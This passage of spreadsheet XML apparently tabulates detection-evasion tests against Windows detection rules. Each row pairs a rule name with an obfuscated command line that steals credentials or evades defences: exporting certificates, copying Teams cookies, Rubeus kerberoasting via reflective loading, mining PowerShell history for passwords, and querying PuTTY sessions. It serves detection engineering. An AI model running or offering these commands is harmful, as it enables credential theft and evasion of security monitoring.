    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="43" t="n"/>
      <c r="B63" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C63" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D63" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E63" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="44" t="n"/>
      <c r="J63" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="43" t="n"/>
      <c r="B64" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C64" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D64" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E64" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F64" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G64" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="43" t="n"/>
      <c r="J64" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="44" t="n"/>
      <c r="B65" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C65" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D65" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E65" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F65" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G65" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H65" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="43" t="n"/>
      <c r="J65" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="44" t="n"/>
      <c r="B66" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C66" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D66" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E66" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="43" t="n"/>
      <c r="J66" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="44" t="n"/>
      <c r="B67" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C67" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D67" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E67" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="44" t="n"/>
      <c r="J67" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="43" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B68" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C68" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D68" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E68" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F68" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G68" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="43" t="n"/>
      <c r="J68" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K68" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B69" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C69" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D69" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E69" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="43" t="n"/>
      <c r="J69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K69" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B70" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C70" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D70" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E70" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="43" t="n"/>
      <c r="J70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B71" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C71" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D71" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E71" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F71" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G71" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H71" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I71" s="43" t="n"/>
      <c r="J71" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K71" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B72" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C72" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D72" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E72" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="43" t="n"/>
      <c r="J72" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B73" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C73" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D73" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E73" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="44" t="n"/>
      <c r="J73" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="44" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B74" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C74" s="44" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D74" s="44" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E74" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c chrome.exe --remote-debugging^--port=9222</t>
        </is>
      </c>
      <c r="F74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="44" t="n"/>
      <c r="J74" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K74" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="44" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B75" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C75" s="44" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D75" s="44" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E75" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c firefox.exe -start-debugger-server^ 6000</t>
        </is>
      </c>
      <c r="F75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="44" t="n"/>
      <c r="J75" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K75" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B76" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C76" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D76" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E76" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F76" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G76" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H76" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="43" t="n"/>
      <c r="J76" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K76" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B77" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C77" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D77" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E77" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F77" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G77" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H77" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="43" t="n"/>
      <c r="J77" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="44" t="n"/>
      <c r="B78" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_teams_suspicious_command_line_cred_access</t>
        </is>
      </c>
      <c r="C78" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Command Targeting Teams Sensitive Files</t>
        </is>
      </c>
      <c r="D78" s="44" t="inlineStr">
        <is>
          <t>d2eb17db-1d39-41dc-b57f-301f6512fa75</t>
        </is>
      </c>
      <c r="E78" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %APPDATA%\Microsoft\Teams &amp;&amp; copy Cookies\* C:\temp\"</t>
        </is>
      </c>
      <c r="F78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="43" t="n"/>
      <c r="J78" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K78" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="44" t="n"/>
      <c r="B79" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_teams_suspicious_command_line_cred_access</t>
        </is>
      </c>
      <c r="C79" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Command Targeting Teams Sensitive Files</t>
        </is>
      </c>
      <c r="D79" s="44" t="inlineStr">
        <is>
          <t>d2eb17db-1d39-41dc-b57f-301f6512fa75</t>
        </is>
      </c>
      <c r="E79" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set A=\Microsoft\Teams&amp; set B=\Cookies&amp; call xcopy %APPDATA%%A%%B% C:\temp\ /E"</t>
        </is>
      </c>
      <c r="F79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I79" s="43" t="n"/>
      <c r="J79" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K79" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B80" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C80" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D80" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E80" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F80" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G80" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H80" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I80" s="43" t="n"/>
      <c r="J80" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K80" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B81" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C81" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D81" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E81" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I81" s="44" t="n"/>
      <c r="J81" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="43" t="n"/>
      <c r="B82" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C82" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D82" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E82" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\updater.exe k^erberoast /outfile:hashes.txt"</t>
        </is>
      </c>
      <c r="F82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I82" s="44" t="n"/>
      <c r="J82" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K82" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="43" t="n"/>
      <c r="B83" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C83" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D83" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E83" s="44" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -Encoding Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I83" s="43" t="n"/>
      <c r="J83" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="43" t="n"/>
      <c r="B84" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C84" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D84" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E84" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -"Encoding" Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F84" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G84" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H84" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I84" s="43" t="n"/>
      <c r="J84" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="43" t="n"/>
      <c r="B85" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C85" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D85" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E85" s="44" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EncodinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="43" t="n"/>
      <c r="J85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="43" t="n"/>
      <c r="B86" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C86" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D86" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E86" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -ENCoDInG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F86" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G86" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H86" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="43" t="n"/>
      <c r="J86" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="44" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B87" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C87" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D87" s="44" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E87" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "Invoke-Expression ('Get-' + 'WinEvent' + ' -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"') | Where-Object {$_.Id -eq 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F87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I87" s="43" t="n"/>
      <c r="J87" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K87" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B88" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_console_history_file_access</t>
        </is>
      </c>
      <c r="C88" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File</t>
        </is>
      </c>
      <c r="D88" s="44" t="inlineStr">
        <is>
          <t>f4ff7323-b5fc-4323-8b52-6b9408e15788</t>
        </is>
      </c>
      <c r="E88" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "powershell.exe &amp; {ls -R C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_hist^ory.txt | Select-String ""password"", ""-p"", ""key"", ""pwd"", ""pass""}"</t>
        </is>
      </c>
      <c r="F88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="43" t="n"/>
      <c r="J88" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K88" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B89" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C89" s="44" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D89" s="44" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E89" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg query HKCU\Software\SimonTatham\Pu^TTY\Sessions /t REG_SZ /s"</t>
        </is>
      </c>
      <c r="F89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="43" t="n"/>
      <c r="J89" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K89" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B90" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C90" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D90" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E90" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F90" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G90" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H90" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I90" s="44" t="n"/>
      <c r="J90" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B91" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C91" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D91" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E91" s="44" t="inlineStr">
        <is>
